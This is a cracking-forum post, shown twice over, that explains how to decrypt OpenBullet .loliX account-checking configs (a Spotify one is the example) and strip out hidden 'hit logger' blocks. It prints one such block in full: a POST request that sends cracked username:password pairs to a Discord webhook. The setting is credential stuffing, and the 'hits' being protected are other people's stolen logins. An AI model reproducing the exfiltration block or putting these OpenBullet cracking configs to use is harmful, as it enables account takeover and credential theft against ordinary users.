OP 01 May, 2020 - 01:50 PM
ENJOY CHECKED WHILE POSTING
Don't Leech put a like IF you like my stuff
Leechers = Get Banned
A direct report of leeching!!!!
1. Be sure to have the OpenBullet Anomaly Mod
https://github.com/P...aly-Mod-Hosting
2. Once you have OpenBullet up and running, head to "Tools" section
3. Click on "Lolix Decrypt"
4. Find where it says "Load from File"
5. Click on it, and find your .loliX file that you think or know may have a hit logger in it.
6. Click on "Save Config"
7. Go to the folder where you had your .loliX config with the possible hitlogger
Let's say your config was named "Spotify.loliX", now it will say "Spotify.loliX_Decrypted.anom"
8. Open up the config (with any text editor, i use Notepad++), check at the end. If it says something like https://discordapp.com/api/webhooks/
remove the whole block part, basically here's an example of a block:
REQUEST POST
"https://discordapp.c...vQ3CM3c07yYFAzf" ReadResponseSource=FALSE
CONTENT "{\"content\":\"<USER>:<PASS>|<Spotify>\"}"
CONTENTTYPE "application/json"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36"
HEADER "Accept: */*"
Also if you find something that's posting <USER>:<PASS> to any website, make sure to remove it...
People have been using custom websites too, even matching names..
Like and rep If u find it helpful
Don't Leech put a like IF you like my stuff
Leechers = Get Banned
A direct report of leeching!!!!
1. Be sure to have the OpenBullet Anomaly Mod
https://github.com/P...aly-Mod-Hosting
2. Once you have OpenBullet up and running, head to "Tools" section
3. Click on "Lolix Decrypt"
4. Find where it says "Load from File"
5. Click on it, and find your .loliX file that you think or know may have a hit logger in it.
6. Click on "Save Config"
7. Go to the folder where you had your .loliX config with the possible hitlogger
Let's say your config was named "Spotify.loliX", now it will say "Spotify.loliX_Decrypted.anom"
8. Open up the config (with any text editor, i use Notepad++), check at the end. If it says something like https://discordapp.com/api/webhooks/
remove the whole block part, basically here's an example of a block:
REQUEST POST
"https://discordapp.c...vQ3CM3c07yYFAzf" ReadResponseSource=FALSE
CONTENT "{\"content\":\"<USER>:<PASS>|<Spotify>\"}"
CONTENTTYPE "application/json"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36"
HEADER "Accept: */*"
Also if you find something that's posting <USER>:<PASS> to any website, make sure to remove it...
People have been using custom websites too, even matching names..
Like and rep If u find it helpful